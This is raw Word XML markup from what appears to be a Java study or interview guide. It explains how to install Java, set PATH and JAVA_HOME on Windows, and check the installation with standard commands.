              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00CE4B95">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2AFF609F" w14:textId="6916AC90" w:rsidR="006C086A" w:rsidRPr="00CE4B95" w:rsidRDefault="006C086A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E6EF2C" w14:textId="5E72AD30" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6E50" w:rsidP="00A51164">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc196307480"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Java</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="52072542" w14:textId="125A028D" w:rsidR="00341B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00341B56" w:rsidP="00341B56">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc196307481"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>Java Fundamentals</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="353AEC40" w14:textId="77777777" w:rsidR="006D5864" w:rsidRPr="00CE4B95" w:rsidRDefault="006D5864" w:rsidP="006D5864">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0010B05C" w14:textId="4191B226" w:rsidR="00231E5A" w:rsidRPr="00CE4B95" w:rsidRDefault="00231E5A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc196307482"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Explain how to install java? Explain directories in it?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="2902956B" w14:textId="1016C383" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="00646C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step 1: Download Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C55E77" w14:textId="421835F7" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Go to the official Oracle website or use OpenJDK: Oracle JDK / OpenJDK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5109DE6A" w14:textId="77777777" w:rsidR="00B87437" w:rsidRPr="00CE4B95" w:rsidRDefault="00B87437" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59A23623" w14:textId="320B3A65" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step 2: Choose Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F03B235" w14:textId="77777777" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Choose the appropriate JDK version (e.g., Java 17 or Java 21 – latest LTS versions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B83BAB6" w14:textId="77777777" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Select the installer for your operating system (Windows, macOS, Linux).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445F9EC5" w14:textId="77777777" w:rsidR="00B87437" w:rsidRPr="00CE4B95" w:rsidRDefault="00B87437" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293515E5" w14:textId="4FB7F454" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step 3: Install Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E06CB84" w14:textId="77777777" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Run the .exe installer and follow the wizard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BAF07D" w14:textId="301FAF7A" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>It installs Java to a default path like: C:\Program Files\Java\jdk-21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E6AA0F" w14:textId="77777777" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A8A568" w14:textId="4A9BAA72" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>macOS/Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D1E098" w14:textId="77777777" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use .tar.gz or package managers like Homebrew, apt, yum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12307E05" w14:textId="77777777" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sudo apt install openjdk-21-jdk  # For Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E119B68" w14:textId="77777777" w:rsidR="00B87437" w:rsidRPr="00CE4B95" w:rsidRDefault="00B87437" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="695F49DA" w14:textId="55EA0068" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step 4: Set Environment Variables (Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A112D8" w14:textId="77777777" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Go to System Properties &gt; Environment Variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495C8DC8" w14:textId="77777777" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479D8699" w14:textId="476A019F" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Add to Path: C:\Program Files\Java\jdk-21\bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D39CD4C" w14:textId="3A7EEBAF" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Set JAVA_HOME: JAVA_HOME = C:\Program Files\Java\jdk-21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCA5786" w14:textId="77777777" w:rsidR="00B87437" w:rsidRPr="00CE4B95" w:rsidRDefault="00B87437" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D85E08F" w14:textId="3C2C13D6" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step 5: Verify Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0404A2D9" w14:textId="77777777" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Open a terminal/command prompt and run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF8689C" w14:textId="77777777" w:rsidR="00756AFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00756AFF" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="606C0A42" w14:textId="77777777" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java -version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C3C9FA" w14:textId="2BD26344" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>javac -version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE6F145" w14:textId="77777777" w:rsidR="005C726C" w:rsidRPr="00CE4B95" w:rsidRDefault="005C726C" w:rsidP="005C726C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3598AB57" w14:textId="75FB5924" w:rsidR="005C726C" w:rsidRPr="00CE4B95" w:rsidRDefault="005C726C" w:rsidP="00EF54D0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4697BFD3" wp14:editId="06D8F57B">
            <wp:extent cx="5593152" cy="3255363"/>
            <wp:effectExtent l="57150" t="57150" r="102870" b="97790"/>
            <wp:docPr id="119368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68526" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5604814" cy="3262151"/>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4E805BE4" w14:textId="35CD3712" w:rsidR="00951458" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005C726C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="73379147">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="580490FB" w14:textId="4AE042C9" w:rsidR="008B3961" w:rsidRPr="00CE4B95" w:rsidRDefault="008B3961">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc196307483"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How to configure java in windows?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="00FBD666" w14:textId="3B9E0437" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00FF7743">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Step 1: Download Java JDK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585CC47F" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00E72EA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o to the official Oracle website or OpenJDK site:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EB13E0" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00CE4B95">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>Oracle JDK</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A667894" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00CE4B95">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>OpenJDK (Adoptium)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
